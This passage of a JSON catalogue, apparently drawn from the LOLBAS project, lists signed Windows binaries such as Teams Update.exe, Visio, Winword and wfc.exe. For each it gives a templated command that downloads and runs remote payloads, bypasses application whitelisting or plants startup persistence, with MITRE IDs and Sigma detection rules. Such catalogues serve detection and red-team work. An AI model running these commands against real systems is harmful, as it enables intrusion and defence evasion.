Bypass"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:6","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:7","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Application Whitelisting Bypass","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:8","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:9","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:10","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:11","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --createShortcut={PATH:.exe} -l=Startup","description":"Copy your payload into \"%localappdata%\\Microsoft\\Teams\\current\\\". Then run the command. Update.exe will create a shortcut to the specified executable in \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\". Then payload will run on every login of the user who runs it.","usecase":"Execute binary","mitre":["T1547"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:12","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --removeShortcut={PATH:.exe}-l=Startup","description":"Run the command to remove the shortcut created in the \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" directory you created with the LolBinExecution \"--createShortcut\" described on this page.","usecase":"Execute binary","mitre":["T1070"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:vsdiagnostics-exe:0","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 1 /launch:{PATH:.exe}","description":"Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"]},{"id":"lolbas:vsdiagnostics-exe:1","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:\"{CMD:args}\"","description":"Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.","usecase":"Proxy execution of binary with arguments","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"]},{"id":"lolbas:vsiisexelauncher-exe:0","toolId":"lolbas:vsiisexelauncher-exe","toolName":"VSIISExeLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSIISExeLauncher.exe -p {PATH:.exe} -a \"{CMD:args}\"","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml"},{"type":"IOC","value":"VSIISExeLauncher.exe spawned an unknown process"}],"references":["https://github.com/timwhitez","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"]},{"id":"lolbas:visio-exe:0","toolId":"lolbas:visio-exe","toolName":"Visio.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Visio.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a visio.exe command line"},{"type":"IOC","value":"visio.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"]},{"id":"lolbas:visualuiaverifynative-exe:0","toolId":"lolbas:visualuiaverifynative-exe","toolName":"VisualUiaVerifyNative.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"VisualUiaVerifyNative.exe","description":"Generate Serialized gadget and save to - `C:\\Users\\%USERNAME%\\AppData\\Roaminguiverify.config` before executing.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/","https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"]},{"id":"lolbas:vslaunchbrowser-exe:0","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"VSLaunchBrowser.exe .exe {REMOTEURL:.exe}","description":"Download and execute payload from remote server","usecase":"It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vslaunchbrowser-exe:1","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}","description":"Execute payload via VSLaunchBrowser as parent process","usecase":"It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vslaunchbrowser-exe:2","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_SMB}","description":"Execute payload from WebDAV server via VSLaunchBrowser as parent process","usecase":"It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vshadow-exe:0","toolId":"lolbas:vshadow-exe","toolName":"Vshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:","description":"Executes specified executable from vshadow.exe.","usecase":"Performs execution of specified executable file.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_vshadow_exec.yml"},{"type":"IOC","value":"vshadow.exe usage with -exec parameter"}],"references":["https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"]},{"id":"lolbas:vsjitdebugger-exe:0","toolId":"lolbas:vsjitdebugger-exe","toolName":"vsjitdebugger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Vsjitdebugger.exe {PATH:.exe}","description":"Executes specified executable as a subprocess of Vsjitdebugger.exe.","usecase":"Execution of local PE file as a subprocess of Vsjitdebugger.exe.","mitre":["T1127"],"privilege":"user","fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml"}],"references":["https://twitter.com/pabraeken/status/990758590020452353","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"]},{"id":"lolbas:wfmformat-exe:0","toolId":"lolbas:wfmformat-exe","toolName":"WFMFormat.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WFMFormat.exe","description":"Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`. If the file `dumpfile.txt` (any content) exists in the current working directory, no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Child process from WFMFormat.exe"},{"type":"IOC","value":"tracerpt.exe processes located anywhere other than c:\\windows\\system32"}],"references":["https://www.microsoft.com/en-us/download/details.aspx?id=103244","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"]},{"id":"lolbas:wfc-exe:0","toolId":"lolbas:wfc-exe","toolName":"Wfc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"wfc.exe {PATH_ABSOLUTE:.xoml}","description":"Execute arbitrary C# code embedded in a XOML file.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"]},{"id":"lolbas:windbg-exe:0","toolId":"lolbas:windbg-exe","toolName":"WinDbg.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"windbg.exe -g {CMD}","description":"Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"]},{"id":"lolbas:winproj-exe:0","toolId":"lolbas:winproj-exe","toolName":"WinProj.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"WinProj.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a WinProj command line"},{"type":"IOC","value":"WinProj making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"]},{"id":"lolbas:winword-exe:0","toolId":"lolbas:winword-exe","toolName":"Winword.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"winword.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"]},{"id":"lolbas:wsb-exe:0","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><LogonCommand><Command>{CMD}</Command></LogonCommand></Configuration>\"\nwsb exec -r System --id YOUR_ID","description":"Executes the given command in a Windows Sandbox from an inline XML configuration with an embedded `<LogonCommand>`, leaving no `.wsb` file on disk. Note: `<LogonCommand>` only fires once `WDAGUtilityAccount` actually logs in, which only happens after an RDP session is established via `wsb connect`, so this pattern opens a visible Sandbox window.","usecase":"Fileless execution of 